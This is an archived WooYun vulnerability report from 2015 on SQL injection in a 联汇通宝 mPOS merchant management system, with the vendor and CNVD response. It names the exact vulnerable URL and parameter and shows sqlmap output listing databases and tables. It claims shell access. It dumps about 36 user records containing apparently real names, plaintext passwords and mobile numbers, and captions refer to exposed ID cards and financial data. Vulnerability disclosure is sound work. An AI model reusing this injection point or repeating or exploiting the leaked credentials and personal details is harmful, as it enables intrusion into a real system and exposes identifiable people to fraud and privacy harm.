当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155237

漏洞标题:联汇通宝某系统SQL注入(涉及4000商户/营业执照/身份证/银行卡/验证码等信息)

相关厂商:联汇通宝

漏洞作者: DNS

提交时间:2015-11-23 18:02

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

厂商是联汇通宝
存在注入
http://mpos.unionpay.so:8383/manager/system/noticeContent.aspx?action=view&id=13&target=mpos id=
back-end DBMS: Microsoft SQL Server 2008
available databases [10]:
[*] channel
[*] distribution
[*] dy_cd_lhtb
[*] lhtmposmerchant
[*] master
[*] model
[*] msdb
[*] railroad
[*] tempdb
[*] trainsms
可执行-os-shell
sql-shell

sqlshell.png


存在的表:

Database: lhtmposmerchant
[79 tables]
+-------------------------------+
| db_area |
| db_billorder_record |
| db_bulletin |
| db_channel_applyUsheild |
| db_channel_dayprofit |
| db_channel_product_costconfig |
| db_channel_product_type |
| db_channel_profitstatistics |
| db_channel_rechargelog |
| db_city |
| db_credit_usedquota |
| db_lhb_user |
| db_lhbblackgold_jsrecord |
| db_lhbblackgold_profit |
| db_lhbdebit_credit_order |
| db_lhbgold_profit |
| db_lhbjhc_jsrecord |
| db_lhbjhc_profit |
| db_lhbjhf_jsrecord |
| db_lhbjhf_profit |
| db_lhbjhn_jsrecord |
| db_lhbjhn_profit |
| db_lhbjht_jsrecord |
| db_lhbjht_profit |
| db_lhbjhy_jsrecord |
| db_lhbjhy_profit |
| db_lhbptgold_jsrecord |
| db_lhbptgold_profit |
| db_lhbrate_config |
| db_lhbsilver_profit |
| db_lhbvipos_order |
| db_lhbwhitegold_profit |
| db_lhbyz_channelrate |
| db_lhbyzrate_config |
| db_lhmall_order_product |
| db_lhmall_order_product |
| db_lhplaneTicket_order |
| db_lhtmpos_billlog |
| db_lhtmpos_billorder |
| db_lhtmpos_order |
| db_lhtmpos_txnorder |
| db_lhtrainTicket_order |
| db_lhtrate_config |
| db_lhtvipos_order |
| db_lhtvipos_rates |
| db_liquidationbankcode |
| db_log |
| db_member |
| db_menu |
| db_merchant_config |
| db_mpos_channelassign |
| db_mpos_channelassign |
| db_mpos_channelrate |
| db_mpos_lhbrate |
| db_mpos_merchant |
| db_mpos_terminal |
| db_newlhb_user |
| db_noqrhmobile |
| db_pay_product_log |
| db_power |
| db_product_apply |
| db_product_buyrecords |
| db_product_class |
| db_product_data |
| db_product_salecost_config |
| db_product_salecost_config |
| db_product_saleman |
| db_province |
| db_role |
| db_sellagency |
| db_sms_send |
| db_sms_wait |
| db_subdistributor |
| db_tempmobile |
| db_terminal_user |
| db_user |
| db_vipuser_rate |
| db_youze_profitstatistics |
| sqlmapoutput |
+-------------------------------+


部分用户

select * from db_user [36]:
[*] 01 2 2014 1:16PM, , 448, 1, VIPOS-陶善忠, 176335, 9, 3, 0, 0, 13032191313
[*] 01 2 2014 2:29PM, , 449, 1, VIPOS-王晓鹤, wxh800918, 9, 3, 0, 0, 15312155678
[*] 01 2 2014 3:12PM, , 450, 1, VIPOS-徐育红, 218321, 9, 3, 0, 0, 13962412277
[*] 01 2 2014 3:18PM, , 451, 1, VIPOS-陈芳, 206323, 9, 3, 0, 0, 18962636627
[*] 01 2 2014 4:20PM, , 452, 1, VIPOS-纪海, 192179, 9, 3, 0, 0, 15618389748
[*] 01 2 2014 4:29PM, , 453, 1, VIPOS-胡国宏, 242510, 9, 3, 0, 0, 15901994055
[*] 01 2 2014 4:50PM, , 454, 1, VIPOS-蒋海, 103619, 9, 3, 0, 0, 18914950187
[*] 01 2 2014 9:44AM, , 447, 1, VIPOS-欧林芝, 250546, 9, 3, 0, 0, 13611933901
[*] 01 3 2014 1:52PM, , 456, 1, VIPOS-王成璋, 043210, 9, 3, 0, 0, 13882177061
[*] 01 3 2014 2:05PM, , 457, 1, VIPOS-吴慧红, 096026, 9, 3, 0, 0, 15800359836
[*] 01 3 2014 11:11AM, , 455, 1, VIPOS-路纯, 017533, 9, 3, 0, 0, 13732671518
[*] 01 6 2014 1:07PM, , 461, 1, VIPOS-甘霖, 220042, 9, 3, 0, 0, 13939945338
[*] 01 6 2014 1:32PM, , 462, 1, VIPOS-庞大江, 249180, 9, 3, 0, 0, 13375151875
[*] 01 6 2014 2:04PM, , 463, 1, VIPOS-裴学丽, 8888, 8, 2, 1, 0, peixueli
[*] 01 6 2014 2:11PM, , 464, 1, VIPOS-向荣, 01724X, 9, 3, 0, 0, 13983211607
[*] 01 6 2014 2:31PM, , 465, 1, VIPOS-杨竹丽, 160885, 9, 3, 0, 0, 13698886899
[*] 01 6 2014 4:32PM, , 468, 1, VIPOS-丁裕菊, 075827, 9, 3, 0, 0, 13906282112
[*] 01 6 2014 11:02AM, , 459, 1, VIPOS-孙培培, 030489, 9, 3, 0, 0, 18616122858
[*] 01 6 2014 12:00AM, , 458, 10, 汪霞白-财务, 123, 5, 1, 0, 0, wangxiabai
[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2015 8:49AM, , 1392, 1, VIPOS-RHXT刘林, 115411, 9, 3, 0, 0, 13458678768
[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014 4:56PM, , 472, 1, VIPOS-唐秋儿, 8888, 8, 2, 1, 0, tangqiuer
[*] 01 7 2014 12:00AM, , 115, 1, VIPOS-李文娟, 8888, 8, 2, 1, 0, liwenjuan
[*] 01 7 2014 12:01PM, , 469, 1, VIPOS-王晓鹤, 8888, 8, 2, 1, 0, wangxiaohe
[*] 01 7 2015 1:32PM, , 1397, 1, VIPOS-RHXT娄晓倩, 115411, 9, 3, 0, 0, 15881576086
[*] 01 7 2015 1:33PM, , 1398, 1, VIPOS-董樊, 115411, 9, 3, 0, 0, 15928406481
[*] 01 7 2015 10:27AM, , 1395, 1, VIPOS-冯高峰, 264911, 9, 3, 0, 0, 13541222112
[*] 01 7 2015 10:28AM, , 1396, 1, VIPOS-刘昌建, 264911, 9, 3, 0, 0, 13540490546
[*] 01 8 2014 9:31AM, , 474, 1, VIPOS-陆文俊, socl8899, 9, 3, 0, 0, 13918788846
[*] 01 8 2014 9:39AM, , 475, 1, VIPOS-张金凤, 015042, 9, 3, 0, 0, 13918190877
[*] 01 8 2014 12:00AM, , 477, 1, VIPOS-王玲凤, 118913, 8, 2, 1, 0, wlf


大部分密码很简单,管理员存在123类似弱口令

财务1.png


财务2.png


财务3.png


财务4.png


财务5.png


财务6.png


财务8.png


财务7.png


操作验证码.png


后台可发送验证码,可发送短信,验证么可见

查看密码.png


可以查看其它用户密码,

超级管理员.png


密码2.png


泄露证件信息.png


泄露用户资料

身份证.png


漏洞证明:

sqlshell.png

修复方案:

版权声明:转载请注明来源 DNS@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-11-27 13:44

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无


漏洞评价:

评价